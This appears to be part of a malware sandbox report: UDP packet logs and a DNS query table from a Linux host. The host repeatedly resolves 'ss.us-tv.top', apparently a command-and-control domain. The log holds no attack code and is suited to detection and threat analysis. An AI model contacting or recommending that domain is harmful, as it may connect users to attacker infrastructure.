Nov 2, 2024 03:58:19.620502949 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:19.620853901 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:19.745662928 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:19.745677948 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:19.745723963 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:19.745783091 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:20.750715971 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:20.750916958 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:20.755548000 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:20.755656004 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:20.879647970 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:20.879722118 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:20.881366968 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:20.881418943 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:21.885951042 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:21.886193991 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:21.890871048 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:21.891005993 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:22.014552116 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:22.014678001 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:23.022428989 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:23.023111105 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:23.027307987 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:23.027873993 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:23.151242018 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:23.151359081 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:23.152210951 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:23.152257919 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:24.159543991 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:24.159596920 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:24.164469957 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:24.164484024 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:24.288661003 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:24.288749933 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:24.289350986 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:24.289405107 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:25.296317101 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:25.296801090 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:25.301155090 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:25.301570892 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:25.425050020 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:25.425134897 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:25.425326109 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:25.425378084 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:26.431963921 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:26.432728052 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:26.436863899 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:26.437768936 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:26.561109066 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:26.561414003 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:26.561547995 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:26.561548948 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:27.565917969 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:27.566139936 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:27.570671082 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:27.570858002 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:27.695017099 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:27.695029974 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:27.695173979 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:27.695173979 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:28.699115992 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:28.699351072 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:28.704173088 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:28.704185963 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:28.828839064 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:28.829128981 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:28.829154968 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:28.829206944 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:29.835902929 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:29.836308956 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:29.840766907 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:29.841074944 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:29.965010881 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:29.965023041 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:29.965234995 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:29.965312958 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:30.971605062 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:30.972700119 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:30.976444960 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:30.977478981 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:31.100979090 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:31.100990057 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:31.101063967 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:31.101080894 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:32.105321884 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:32.105545044 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:32.110199928 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:32.110260010 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:32.322081089 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:32.322227955 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:33.326811075 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:33.327018023 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:33.331671000 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:33.331845045 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:33.455640078 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:33.455666065 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:33.455729961 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:33.455729961 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:34.460148096 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:34.460366964 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:34.465029001 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:34.465116978 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:34.931361914 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:34.931394100 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:34.931574106 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:34.931574106 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:35.935776949 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:35.936037064 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:35.940740108 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:35.940872908 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:36.064246893 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:36.064347982 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:36.064382076 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:36.064439058 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:37.068933964 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:37.069173098 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:37.073729992 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:37.073931932 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:37.197391033 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:37.197602034 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:37.197696924 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:37.197757006 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:38.202646971 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:38.202944994 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:38.207520962 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:38.207707882 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:38.331468105 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:38.331479073 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:38.331612110 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:38.331686974 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:39.338419914 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:39.338644981 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:39.343364000 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:39.343383074 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:39.472635984 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:39.472712994 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:40.477942944 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:40.478199005 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:40.482734919 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:40.482924938 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:40.607630014 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:40.607752085 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:40.607867956 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:40.607868910 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:40.608370066 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:40.608464956 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:40.613207102 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:41.614103079 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:41.619062901 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:41.619148970 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:41.619148970 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:41.619195938 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:41.624016047 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:41.624026060 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:42.236716032 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:42.236768007 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:42.236838102 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:42.236839056 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:43.244568110 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:43.244647980 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:43.249362946 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:43.249404907 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:43.372993946 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:43.373050928 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:44.379064083 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:44.379064083 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:44.383922100 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:44.383990049 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:44.507843971 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:44.507854939 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:44.507951021 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:44.507951975 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:45.515105009 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:45.515619040 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:45.519934893 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:45.520359993 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:45.644843102 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:45.644963026 CET	42302	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:45.645143032 CET	53	42302	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:45.645199060 CET	42302	53	192.168.2.23	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 2, 2024 03:56:50.830485106 CET	192.168.2.23	8.8.8.8	0x1693	Standard query (0)	www.google.com	28	IN (0x0001)	false
Nov 2, 2024 03:56:50.830528975 CET	192.168.2.23	8.8.8.8	0xa193	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:51.473386049 CET	192.168.2.23	8.8.8.8	0x74dd	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:51.475776911 CET	192.168.2.23	8.8.8.8	0x2009	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:52.611937046 CET	192.168.2.23	8.8.8.8	0x5e95	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:52.612117052 CET	192.168.2.23	8.8.8.8	0xb7fa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:53.748439074 CET	192.168.2.23	8.8.8.8	0x85b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:53.748620987 CET	192.168.2.23	8.8.8.8	0xaa8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:54.884054899 CET	192.168.2.23	8.8.8.8	0x21ab	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:54.884303093 CET	192.168.2.23	8.8.8.8	0xe9fb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:56.020287037 CET	192.168.2.23	8.8.8.8	0xd9e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:56.020502090 CET	192.168.2.23	8.8.8.8	0x5a0d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:56.040842056 CET	192.168.2.23	8.8.8.8	0x5a0d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:57.359783888 CET	192.168.2.23	8.8.8.8	0x9944	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:57.360002995 CET	192.168.2.23	8.8.8.8	0xca54	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:58.496243000 CET	192.168.2.23	8.8.8.8	0xdffa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:56:58.496493101 CET	192.168.2.23	8.8.8.8	0xc300	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:59.631532907 CET	192.168.2.23	8.8.8.8	0xcc3b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:56:59.631799936 CET	192.168.2.23	8.8.8.8	0x3a7d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:00.767141104 CET	192.168.2.23	8.8.8.8	0xa1f6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:00.767585993 CET	192.168.2.23	8.8.8.8	0x3b45	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:01.902688980 CET	192.168.2.23	8.8.8.8	0x3bb5	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:01.903151989 CET	192.168.2.23	8.8.8.8	0x49e4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:03.041054010 CET	192.168.2.23	8.8.8.8	0xcfb2	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:03.041153908 CET	192.168.2.23	8.8.8.8	0x21f6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:04.178806067 CET	192.168.2.23	8.8.8.8	0x560f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:04.179040909 CET	192.168.2.23	8.8.8.8	0x41d1	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:05.315104961 CET	192.168.2.23	8.8.8.8	0x31e8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:05.315501928 CET	192.168.2.23	8.8.8.8	0xe5a1	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:06.451746941 CET	192.168.2.23	8.8.8.8	0x5d8b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:06.452193022 CET	192.168.2.23	8.8.8.8	0x9c2f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:07.599009991 CET	192.168.2.23	8.8.8.8	0x426c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:07.599147081 CET	192.168.2.23	8.8.8.8	0xe57b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:08.736738920 CET	192.168.2.23	8.8.8.8	0x4362	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:08.736849070 CET	192.168.2.23	8.8.8.8	0x9245	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:09.875456095 CET	192.168.2.23	8.8.8.8	0x4b5f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:09.875597000 CET	192.168.2.23	8.8.8.8	0x2253	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:11.012686014 CET	192.168.2.23	8.8.8.8	0x29ef	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:11.012744904 CET	192.168.2.23	8.8.8.8	0xa1e4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:12.336081028 CET	192.168.2.23	8.8.8.8	0x968a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:12.336368084 CET	192.168.2.23	8.8.8.8	0x7dd8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:13.475521088 CET	192.168.2.23	8.8.8.8	0x8344	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:13.475676060 CET	192.168.2.23	8.8.8.8	0x5d19	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:14.611634016 CET	192.168.2.23	8.8.8.8	0x8c33	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:14.611787081 CET	192.168.2.23	8.8.8.8	0xbc9f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:15.747915030 CET	192.168.2.23	8.8.8.8	0x5298	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:15.748225927 CET	192.168.2.23	8.8.8.8	0x2aa9	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:16.887691021 CET	192.168.2.23	8.8.8.8	0xac12	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:16.888500929 CET	192.168.2.23	8.8.8.8	0x70cf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:18.027771950 CET	192.168.2.23	8.8.8.8	0x7cb9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:18.028121948 CET	192.168.2.23	8.8.8.8	0x2c4b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:19.165117979 CET	192.168.2.23	8.8.8.8	0x63e6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:19.165554047 CET	192.168.2.23	8.8.8.8	0x11f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:20.301353931 CET	192.168.2.23	8.8.8.8	0xe31a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:20.301523924 CET	192.168.2.23	8.8.8.8	0xe4e2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:21.438817978 CET	192.168.2.23	8.8.8.8	0xf974	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:21.439158916 CET	192.168.2.23	8.8.8.8	0x7ff9	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:22.576751947 CET	192.168.2.23	8.8.8.8	0xe1e8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:22.576953888 CET	192.168.2.23	8.8.8.8	0x77b7	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:23.713649988 CET	192.168.2.23	8.8.8.8	0x3e02	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:23.713835955 CET	192.168.2.23	8.8.8.8	0x2d57	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:24.852494955 CET	192.168.2.23	8.8.8.8	0x203b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:24.852716923 CET	192.168.2.23	8.8.8.8	0xe5ab	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:25.993796110 CET	192.168.2.23	8.8.8.8	0xaa97	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:25.994683027 CET	192.168.2.23	8.8.8.8	0x6fcb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:27.137703896 CET	192.168.2.23	8.8.8.8	0x4d33	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:27.137749910 CET	192.168.2.23	8.8.8.8	0x2451	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:28.739887953 CET	192.168.2.23	8.8.8.8	0xa4fe	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:28.740145922 CET	192.168.2.23	8.8.8.8	0x587a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:29.875040054 CET	192.168.2.23	8.8.8.8	0xf024	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:29.875564098 CET	192.168.2.23	8.8.8.8	0xf101	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:31.008903980 CET	192.168.2.23	8.8.8.8	0xef15	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:31.009088993 CET	192.168.2.23	8.8.8.8	0xdc87	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:32.144408941 CET	192.168.2.23	8.8.8.8	0xeba8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:32.144910097 CET	192.168.2.23	8.8.8.8	0xfb8a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:33.278618097 CET	192.168.2.23	8.8.8.8	0x934d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:33.278948069 CET	192.168.2.23	8.8.8.8	0x2904	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:34.413705111 CET	192.168.2.23	8.8.8.8	0x96e5	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:34.414551973 CET	192.168.2.23	8.8.8.8	0xcaf0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:35.544514894 CET	192.168.2.23	8.8.8.8	0x568d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:35.544703007 CET	192.168.2.23	8.8.8.8	0x56fb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:36.674302101 CET	192.168.2.23	8.8.8.8	0xbb95	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:36.674587965 CET	192.168.2.23	8.8.8.8	0x5b01	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:37.807739019 CET	192.168.2.23	8.8.8.8	0xc926	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:37.808197975 CET	192.168.2.23	8.8.8.8	0x8b3a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:38.939394951 CET	192.168.2.23	8.8.8.8	0xcb5d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:38.939686060 CET	192.168.2.23	8.8.8.8	0xa623	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 03:57:40.070782900 CET	192.168.2.23	8.8.8.8	0x9bba	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 03:57:40.070977926 CET	192.168.2.23	8.8.8.8	0x687c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
